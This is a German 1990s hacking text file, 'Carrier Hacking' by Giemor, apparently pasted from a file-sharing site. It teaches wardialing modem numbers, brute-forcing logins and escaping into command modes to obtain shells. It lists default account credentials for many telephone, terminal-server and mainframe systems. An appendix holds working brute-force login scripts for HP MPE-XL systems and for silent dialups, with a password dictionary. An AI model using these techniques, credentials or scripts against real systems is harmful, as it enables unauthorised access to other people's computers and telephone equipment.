carriers.txt 23 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842843844845846847848849850851852853854855856857858859860861862863864865866867868869870871872873874875876877878879880881882883884
  1. CARRIER HACKING
  2. by Giemor
  3. Warum Carrier Scanning/Hacking
  4. ------------------------------
  5. In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA
  6. sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken.
  7. Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom.
  8. Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet
  9. und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve,
  10. IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich
  11. dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270,
  12. FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc...
  13. Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder
  14. nicht-oeffentliche in die man sich social-engineered) einloggen und mit
  15. Kumpels leicht Software austauschen oder man versucht herauszufinden, was
  16. sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt.
  17. Wie findet man Carriers
  18. -----------------------
  19. Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen.
  20. (thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten
  21. Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes
  22. finden kann, uns aber speziell hier die gefundenen Modems interessieren.
  23. Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity,
  24. data length, stop bits, ausprobiert sowie breaks sendet, <cr>, <.> etc. und
  25. schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem
  26. ausgibt in einer Logdatei speichert.
  27. Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt,
  28. da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann.
  29. Was sind Silent Carriers
  30. ------------------------
  31. Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System
  32. muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation,
  33. oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch
  34. eingestellt.
  35. a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1.
  36. die meisten Systeme benutzten 8N1, 7E1 und 7O1.
  37. b) aendert die Terminal emulation:
  38. IBM 3101 TV 910 BEEHIVE ATL078
  39. IBM PC/FTTERM COLOR LS ADM3A UDT01
  40. IBM PC/FTTERM MONO ADDS VP UDT02
  41. IBM 3161/62/63 HAZEL 1500 UDT03
  42. IBM 3151 HAZEL ESP I UDT04
  43. IBM 3164 HAZEL ESP II UDT05
  44. VT52 NT DISPLAY ANSI
  45. VT100 TT 5410 ANSI-BBS
  46. VT220 TT 5420
  47. FALCO 500 HP 2621B Qmodem Pro unterstuetzt
  48. WYSE 50 DG D210 diese Emulationen
  49. c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal
  50. Programm unterstuetzt.
  51. d) drueckt oefters hinter einander, <cr>, esc, .' sendet mehrere breaks,
  52. e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen,
  53. und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am
  54. besten ein Zyxel und ein USR Courier, aeltere Modelle reichen.
  55. f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e
  56. versagt ;-)
  57. Ich habe ein System gefunden
  58. ----------------------------
  59. Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat.
  60. Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil.
  61. Dann kann man z.B. alle standart Accounts durchprobieren.
  62. Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte
  63. man deren Produkte oder Mitarbeiter Namen als login und Password
  64. versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force
  65. Hacking uebrig. Man probiert mit einem programm alle moeglichen
  66. Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man
  67. macht das an einem System wo man endlos eingabe versuche hat. Ein gutes
  68. Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige
  69. System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript
  70. gibts dazu im Anhang.
  71. Suspend/Command Modus
  72. ---------------------
  73. Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter
  74. etc. etc. - nur haben sie vielleicht etwas uebersehen :
  75. Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft
  76. noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim
  77. Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O"
  78. die Verbindung weiter benutzen kann. Andere Programme lassen sich in den
  79. Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix)
  80. Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+
  81. sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29).
  82. Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so
  83. einen Command modus bietet oder das System was einen das Programm suspenden
  84. laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell,
  85. also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche
  86. Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B.
  87. einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk
  88. abscannen oder sogar hacken.
  89. Sonderfall: Internet
  90. --------------------
  91. Besonders interessant sind Rechner die am Internet angeschlossen sind.
  92. Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen
  93. hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem
  94. Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet
  95. in den Host oder das Netzwerk hineinzukommen.
  96. Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards)
  97. die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und
  98. darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert.
  99. Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder
  100. traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder
  101. aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist
  102. die Finger davon lassen.
  103. -------------------------------capture----------------------------------------
  104. CONNECT 14400/ARQ/MNP5
  105. Trying ...
  106. Connected to 192.354.24.5
  107. Escape character is '^]'.
  108. UNIX(r) System V Release 4.0 (sisy500)
  109. Login:
  110. -------------------------------capture----------------------------------------
  111. Systeme mit standart Accounts
  112. -----------------------------
  113. ------------------------------------------------------------------------------
  114. DECserver Communications Server
  115. DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1
  116. Local -010- Session 1 to ZYNET1 established
  117. Login:
  118. PASSWORD:
  119. Local -011- Session 1 disconnected from ZYNET1
  120. hello>
  121. Standart Accounts:
  122. ------------------
  123. ACCESS
  124. SYSTEM
  125. Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2
  126. ------------------------------------------------------------------------------
  127. Xyplex Terminal Server.
  128. Enter username>
  129. Local>
  130. Standart Accounts:
  131. ------------------
  132. ACCESS
  133. SYSTEM
  134. ------------------------------------------------------------------------------
  135. Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc
  136. Checking authorization, Please wait...
  137. Annex username: (Enter your NCI userid)
  138. Annex password: (Enter your NCI password)
  139. Permission granted
  140. Annex:
  141. Befehl Parameter Beschreibung
  142. ---------------------------------------------------
  143. ? ? [] :Hilfe
  144. bg bg [-dq] [%][%,+,-,,] :Eine Aktion in Hintergrund setzen
  145. fg fg [-q] [%][%,+,-,,] :zurueck zu einer aktuellen Aktion
  146. hangup hangup [-q] :Auflegen und Port reseten
  147. help help [] :Hilfe
  148. jobs jobs :Zeigt aktuelle Aktionen an
  149. kill kill [%][%,+,-,,]... :Kille eine Aktion
  150. stty stty [parameter [value]]... :Show/Set Annex Port Parameter
  151. telnet telnet [-rsst] [ [port]] :Starte Telnet Connection
  152. who who [[-l] []@ ...] :Zeigt System User
  153. Standart accounts:
  154. ------------------
  155. guest guest
  156. ------------------------------------------------------------------------------
  157. ROLM PhoneMail 9252 9254 Microcode Version 5.2
  158. Login: ?
  159. Valid login modes are:
  160. SYSADMIN,
  161. TECH,
  162. POLL.
  163. Login:tech
  164. Password:tech
  165. ROLM PhoneMail 9252 9254 Microcode Version 5.2
  166. Copyright (C) ROLM Systems 1991
  167. All Rights Reserved.
  168. Aktion:
  169. ( Mit den Befehl "?" oder help kommt man zum folgenden menue)
  170. The following commands are valid:
  171. Activate <session #> - Activate the session
  172. Broadcast - Broadcast a message to all terminals
  173. Connect <subsystem> <node #> - Invoke the subsystem
  174. Terminate <session #> - Terminate the session
  175. List - List all open sessions
  176. Logout - Terminate all sessions and log off.
  177. Login <login mode> - Logout and login again.
  178. Display - Display sessions status on a site.
  179. TechView <on/off> - Enable/Disable TechView training.
  180. ------------------------------------------------------------------
  181. Beschreibung aus TFC05:
  182. ActivatePM : Starts the Phone Mail system.
  183. AssignClasses : External program to assign COS to each user in the
  184. database. Only local non-Call Processing users are
  185. assigned classes.
  186. BackupDataBase : Create a backup of the customer database on HD or
  187. floppies.
  188. BackupNames : Copies name header information for all subscribers to
  189. a floppy/floppies.
  190. CallProcessing : An external program to create and maintain Mailbox
  191. Profiles.
  192. ChannelTrace : Lists the current state of each channel. Continously
  193. updates until interrupted.
  194. DeactivatePM : Turn off PM system. DON'T USE THIS UNLESS YOU ARE
  195. VERY SURE OF WHAT YOU ARE DOING! Calls will no
  196. longer be taken by the PM if it is deactivated.
  197. DList : Show distribution lists.
  198. FFormat : Format a floppy disk. The single most useless command
  199. for a remote user.
  200. LogOff : Quit session and go to session manager menu.
  201. MonitorLogon : Monitor users logging in to PM.
  202. MonitorTapLink : Shows tap traffic on CBX integrated systems. Continues
  203. to update until interrupted.
  204. OCConfigAndTest : Utility to configure and test all outcalling
  205. related parameters.
  206. Profile : Add All Clear Delete Fix List Modify Purge
  207. Reports : Display reports.
  208. CallActivity : Displays call activity by the hour, with averages.
  209. Standart accounts
  210. -----------------
  211. sysadmin sysadmin
  212. operator operator
  213. poll poll oder tech
  214. tech tech oder operator
  215. Info:
  216. Eine genaue Beschreibung ueber dieses System giebt es in TFC #5
  217. ------------------------------------------------------------------------------
  218. ROLM CBX II
  219. ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
  220. BIND DATE: 7/APR/93
  221. COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
  222. ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
  223. YOU HAVE ENTERED CPU 1
  224. 12:38:47 ON WEDNESDAY 2/15/1995
  225. USERNAME: op
  226. PASSWORD:
  227. INVALID USERNAME-PASSWORD PAIR
  228. Standart Accounts:
  229. ------------------
  230. op op
  231. op operator
  232. su super
  233. admin pwp
  234. eng engineer
  235. ------------------------------------------------------------------------------
  236. ARC NetBlazer Version 2.1
  237. ARC-login:
  238. Standart Accounts:
  239. ------------------
  240. test
  241. setup
  242. remote
  243. snmp
  244. MAV
  245. ------------------------------------------------------------------------------
  246. Telebit's NetBlazer Version 2.0x5
  247. netblzr2 login:
  248. Standart Accounts:
  249. ------------------
  250. test
  251. setup
  252. remote
  253. snmp
  254. MAV
  255. ------------------------------------------------------------------------------
  256. IFG's VAX 8650
  257. %SECURE-I-NET, Incoming number logged by Secure-net
  258. Username:
  259. Password:
  260. Welcome to VAX 8650
  261. $
  262. Standart Accounts:
  263. ------------------
  264. Vax
  265. Vms
  266. Dcl
  267. Demo
  268. Test
  269. Help
  270. News
  271. Guest
  272. Decnet
  273. Systest
  274. Uetp
  275. Default
  276. User
  277. Field
  278. Service
  279. System
  280. Manager
  281. Operator
  282. ------------------------------------------------------------------------------
  283. HP 3000
  284. MPE XL:
  285. MPE XL:HELLO
  286. Expected [session name,] user.acct [,group]. (CIERR 1424)
  287. MPE XL:hello mgr.sys
  288. ENTER ACCOUNT (SYS) PASSWORD:
  289. ENTER ACCOUNT (SYS) PASSWORD:
  290. ENTER ACCOUNT (SYS) PASSWORD:
  291. Standart Accounts:
  292. ------------------
  293. HELLO MANAGER.SYS
  294. HELLO MGR.SYS
  295. HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
  296. HELLO OP.OPERATOR
  297. MGR CAROLIAN
  298. MGR CCC
  299. MGR CNAS
  300. MGR CONV
  301. MGR COGNOS
  302. OPERATOR COGNOS
  303. MANAGER COGNOS
  304. OPERATOR DISC
  305. MGR HPDESK
  306. MGR HPWORD
  307. FIELD HPWORD
  308. MGR HPOFFICE
  309. SPOOLMAN HPOFFICE
  310. ADVMAIL HPOFFICE
  311. MAIL HPOFFICE
  312. WP HPOFFICE
  313. MANAGER HPOFFICE
  314. MGR HPONLY
  315. FIELD HPP187
  316. MGR HPP187
  317. MGR HPP189
  318. MGR HPP196
  319. MGR INTX3
  320. MGR ITF3000
  321. MANAGER ITF3000
  322. MAIL MAIL
  323. MGR NETBASE
  324. MGR REGO
  325. MGR RJE
  326. MGR ROBELLE
  327. MANAGER SECURITY
  328. MGR SECURITY
  329. FIELD SERVICE
  330. MANAGER SYS
  331. MGR SYS
  332. PCUSER SYS
  333. RSBCMON SYS
  334. OPERATOR SYS
  335. OPERATOR SYSTEM
  336. FIELD SUPPORT
  337. OPERATOR SUPPORT
  338. MANAGER TCH
  339. MAIL TELESUP
  340. MANAGER TELESUP
  341. MGR TELESUP
  342. SYS TELESUP
  343. MGE VESOFT
  344. MGE VESOFT
  345. MGR WORD
  346. MGR XLSERVER
  347. Ein Login Hacker Script gibt es im Anhang
  348. ------------------------------------------------------------------------------
  349. System75
  350. Login: root
  351. INCORRECT LOGIN
  352. Login: browse
  353. Password:
  354. Software Version: G3s.b16.2.2
  355. Terminal Type (513, 4410, 4425): [513]
  356. Standart Accounts:
  357. ------------------
  358. bcim bcimpw
  359. bciim bciimpw
  360. bcms bcmspw, bcms
  361. bcnas bcnspw
  362. blue bluepw
  363. browse looker, browsepw
  364. craft crftpw, craftpw, crack
  365. cust custpw
  366. enquiry enquirypw
  367. field support
  368. inads indspw, inadspw, inads
  369. init initpw
  370. kraft kraftpw
  371. locate locatepw
  372. maint maintpw, rwmaint
  373. nms nmspw
  374. rcust rcustpw
  375. support supportpw
  376. tech field
  377. ------------------------------------------------------------------------------
  378. AIX
  379. IBM AIX Version 3 for RISC System/6000
  380. (C) Copyrights by IBM and by others 1982, 1990.
  381. login:
  382. Standart Accounts:
  383. ------------------
  384. guest guest
  385. ------------------------------------------------------------------------------
  386. AS/400
  387. UserID?
  388. Password?
  389. Standart Accounts:
  390. ------------------
  391. qsecofr qsecofr
  392. qsysopr qsysopr
  393. qpgmr qpgmr
  394. ibm password
  395. ibm 2222
  396. ibm service
  397. qsecofr 1111111
  398. qsecofr 2222222
  399. qserv qserv
  400. qsvr qsvr
  401. secofr secofr
  402. qsrv ibmce1
  403. ------------------------------------------------------------------------------
  404. Systeme ohne Standart Accounts
  405. ------------------------------
  406. CDC Cyber
  407. WELCOME TO THE NOS SOFTWARE SYSTEM.
  408. COPYRIGHT CONTROL DATA 1978, 1987.
  409. 88/02/16. 02.36.53. N265100
  410. CSUS CYBER 170-730. NOS 2.5.2-678/3.
  411. FAMILY:
  412. You would normally just hit return at the family prompt. Next prompt is:
  413. USER NAME:
  414. ------------------------------------------------------------------------------
  415. Cisco Router
  416. cisco_router_1> (kann jeder beliebige Promt sein)
  417. cisco_router_1>LOGIN
  418. Username:
  419. Password:
  420. ------------------------------------------------------------------------------
  421. GTN
  422. WELCOME TO CITIBANK. PLEASE SIGN ON.
  423. XXXXXXXX
  424. @
  425. PASSWORD =
  426. @
  427. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  428. PLEASE ENTER YOUR ID:-1->
  429. PLEASE ENTER YOUR PASSWORD:-2->
  430. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  431. XXX.XXX
  432. PLEASE SELECT SERVICE REQUIRED.-3->
  433. ------------------------------------------------------------------------------
  434. Lantronix Terminal Server
  435. Lantronix ETS16 Version V3.1/1(940623)
  436. Type HELP at the 'Local_15> ' prompt for assistance.
  437. Login password>
  438. ------------------------------------------------------------------------------
  439. NIH Timesharing
  440. NIH Tri-SMP 7.02-FF 16:30:04 TTY11
  441. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  442. Please LOGIN
  443. .
  444. ------------------------------------------------------------------------------
  445. VM/ESA ONLINE
  446. TBVM2 VM/ESA Rel 1.1 PUT 9200
  447. Fill in your USERID and PASSWORD and press ENTER
  448. (Your password will not appear when you type it)
  449. USERID ===>
  450. PASSWORD ===>
  451. COMMAND ===>
  452. ------------------------------------------------------------------------------
  453. ANHANG:
  454. Login Hacker Scripts:
  455. ---------------------
  456. [BEGIN hp_mpe.txt]
  457. ;
  458. ;
  459. ; ------------------------------------------------------------------------
  460. ; HP MPE-XL : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)
  461. ; ------------------------------------------------------------------------
  462. ;
  463. ;
  464. ; MPE XL:
  465. ; EXPECTED A :HELLO COMMAND. (CIERR 6057)
  466. ; MPE XL: hello
  467. ; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
  468. ;
  469. ;
  470. =============================================================================
  471. #DEFINE
  472. PHONE_NR=*
  473. LOGFILE=*.log
  474. DIAL_TRIES=100
  475. LOGIN_TRIES=0
  476. DIC(1)=hp_mpe_a.dic
  477. ; uncomment command lines below to check for 6 more common MPE passwords
  478. #NOCARRIER
  479. LOG(CARRIER LOST on $DATE at $TIME)
  480. LOG()
  481. GOTO(1)
  482. #START
  483. LOG(--------------------------------------------------------------------------)
  484. LOG( TARGET : $PHONE_NR )
  485. LOG( DATE : $DATE )
  486. LOG( TIME : $TIME )
  487. LOG()
  488. LOG_SESSION_ON
  489. SET D_TMP=1
  490. SET S_TMP=X
  491. :1
  492. SET STRING=X
  493. DIAL
  494. WAIT(1)
  495. IF STRING~XL THEN GOTO(2)
  496. WAIT4STRING(2,^M,6,GOTO(1),XL)
  497. :2
  498. SET STRING=X
  499. SEND_(HELLO )
  500. IF D_TMP=1 THEN SEND_(ADVMAIL.)
  501. IF D_TMP=2 THEN SEND_(FIELD.)
  502. IF D_TMP=3 THEN SEND_(MAIL.)
  503. IF D_TMP=4 THEN SEND_(MANAGER.)
  504. IF D_TMP=5 THEN SEND_(MGE.)
  505. IF D_TMP=6 THEN SEND_(MGR.)
  506. IF D_TMP=7 THEN SEND_(OP.)
  507. IF D_TMP=8 THEN SEND_(OPERATOR.)
  508. IF D_TMP=9 THEN SEND_(PCUSER.)
  509. IF D_TMP=10 THEN SEND_(RSBCMON.)
  510. IF D_TMP=11 THEN SEND_(SPOOLMAN.)
  511. IF D_TMP=12 THEN SEND_(SYS.)
  512. IF D_TMP=13 THEN SEND_(WP.)
  513. IF S_TMP=X THEN SEND_NEXT_DIC(1)
  514. IF S_TMP=Y THEN SEND_DIC(1)
  515. IF S_TMP=Z THEN SEND_DIC(1)
  516. IF S_TMP=A THEN SEND_DIC(1)
  517. ; IF S_TMP=B THEN SEND_DIC(1)
  518. ; IF S_TMP=C THEN SEND_DIC(1)
  519. IF D_TMP=13 THEN SET S_TMP=X
  520. IF D_TMP=13 THEN SET D_TMP=1
  521. WAIT(1)
  522. ; set this higher if the system response is slow
  523. IF STRING2~HELLO THEN GOTO(3)
  524. IF STRING2~exists THEN GOTO(3)
  525. IF STRING2~on-ex THEN GOTO(4)
  526. IF STRING2~ASSW THEN GOTO(5)
  527. WAIT(2)
  528. IF STRING2~HELLO THEN GOTO(3)
  529. IF STRING2~exists THEN GOTO(3)
  530. IF STRING2~on-ex THEN GOTO(4)
  531. IF STRING2~ASSW THEN GOTO(5)
  532. GOTO(1)
  533. :3
  534. INC(D_TMP)
  535. GOTO(2)
  536. :4
  537. SET S_TMP=X
  538. SET D_TMP=1
  539. :5
  540. IF S_TMP=Z THEN GOTO(6)
  541. IF S_TMP=A THEN GOTO(7)
  542. ;IF S_TMP=B THEN GOTO(8)
  543. ;IF S_TMP=C THEN GOTO(9)
  544. SET S_TMP=Z
  545. LOG_($DIC(1))
  546. SEND_DIC(1)
  547. WAIT(1)
  548. LOG_(HPOnly)
  549. SEND(HPOnly)
  550. WAIT(1)
  551. LOG_(HP)
  552. SEND(HP)
  553. WAIT(2)
  554. GOTO(1)
  555. :6
  556. SET S_TMP=A
  557. LOG_(MPE)
  558. SEND(MPE)
  559. LOG_(Manager)
  560. SEND(Manager)
  561. WAIT(1)
  562. LOG_(mgr)
  563. SEND(mgr)
  564. WAIT(2)
  565. GOTO(1)
  566. :7
  567. SET S_TMP=X
  568. ; SET S_TMP=B
  569. LOG_(remote)
  570. SEND(remote)
  571. WAIT(1)
  572. LOG_(TeleSup)
  573. SEND(TeleSup)
  574. WAIT(1)
  575. LOG_(operator)
  576. SEND(operator)
  577. WAIT(2)
  578. GOTO(1)
  579. ; SET S_TMP=C
  580. ; LOG_(tech)
  581. ; SEND(tech)
  582. ; WAIT(1)
  583. ; LOG_(mail)
  584. ; SEND(mail)
  585. ; WAIT(1)
  586. ; LOG_(hpoffice)
  587. ; SEND(hpoffice)
  588. ; WAIT(2)
  589. ; GOTO(1)
  590. ; :9
  591. ; SET S_TMP=X
  592. ; LOG_(sys)
  593. ; SEND(sys)
  594. ; WAIT(1)
  595. ; LOG_(security)
  596. ; SEND(security)
  597. ; WAIT(1)
  598. ; LOG_(support)
  599. ; SEND(support)
  600. ; LOG_(hpoffice)
  601. ; SEND(hpoffice)
  602. ; WAIT(2)
  603. ; GOTO(1)
  604. ; :9
  605. ; SET S_TMP=X
  606. ; LOG_(sys)
  607. ; SEND(sys)
  608. ; WAIT(1)
  609. ; LOG_(security)
  610. ; SEND(security)
  611. ; WAIT(1)
  612. ; LOG_(support)
  613. ; SEND(support)
  614. ; GOTO(1)
  615. :100
  616. LOG()
  617. LOG( END OF : $PHONE_NR )
  618. LOG(--------------------------------------------------------------------------)
  619. #END
  620. [END]
  621. [BEGIN hp_mpe_a.dic]
  622. CAROLIAN
  623. CCC
  624. CNAS
  625. COGNOS
  626. CONV
  627. DISC
  628. HP
  629. HPDESK
  630. HPOFFICE
  631. HPONLY
  632. HPP187
  633. HPP189
  634. HPP196
  635. HPUNSUP
  636. HPWORD
  637. INTX3
  638. ITF3000
  639. MAIL
  640. NETBASE
  641. OPERATOR
  642. REGO
  643. RJE
  644. ROBELLE
  645. HPP187
  646. HPP189
  647. HPP196
  648. HPUNSUP
  649. HPWORD
  650. INTX3
  651. ITF3000
  652. MAIL
  653. NETBASE
  654. OPERATOR
  655. REGO
  656. RJE
  657. ROBELLE
  658. SERVICE
  659. SUPPORT
  660. SYS
  661. SYSTEM
  662. TCH
  663. TELESUP
  664. VESOFT
  665. WORD
  666. XLSERVER
  667. [END]
  668. [BEGIN silent.txt]
  669. ;
  670. ;
  671. ; ------------------------------------------------------------------------
  672. ; Silent Dialups : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser)
  673. ; ------------------------------------------------------------------------
  674. ;
  675. ; Silent Dialups : No output/response from dialup modem
  676. ; (both types, 30 sec hangup & unlimited)
  677. ;
  678. ; (takes approx. 9-10 hours)
  679. ;
  680. ;
  681. =============================================================================
  682. #DEFINE
  683. PHONE_NR=####
  684. LOGFILE=####
  685. DIAL_TRIES=50
  686. LOGIN_TRIES=0
  687. BRUTE(1)=^$,1,1,3
  688. ; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length.
  689. #NOCARRIER
  690. CHECK4OUTPUT(OFF)
  691. LOG(CARRIER LOST on $DATE at $TIME)
  692. LOG()
  693. LOG()
  694. GOTO(1)
  695. #START
  696. LOG(--------------------------------------------------------------------------)
  697. LOG( TARGET : $PHONE_NR )
  698. LOG( DATE : $DATE )
  699. LOG( TIME : $TIME )
  700. LOG()
  701. LOG_SESSION_ON
  702. :1
  703. DIAL
  704. WAIT(1)
  705. CHECK4OUTPUT(99)
  706. :2
  707. SEND_NEXT_BRUTE(1)
  708. WAIT_(255)
  709. ;waits 255ms between every attempt
  710. GOTO(2)
  711. CHECK4OUTPUT(99)
  712. :2
  713. SEND_NEXT_BRUTE(1)
  714. WAIT_(255)
  715. ;waits 255ms between every attempt
  716. GOTO(2)
  717. :99
  718. CHECK4CARRIER(OFF)
  719. WAIT(5)
  720. CHECK4CARRIER(#NOCARRIER)
  721. :100
  722. HANGUP
  723. BEEP
  724. BEEP
  725. BEEP
  726. LOG()
  727. LOG()
  728. LOG( FOUND : $BRUTE(1))
  729. LOG(--------------------------------------------------------------------------)
  730. #END
  731. [END]
  732.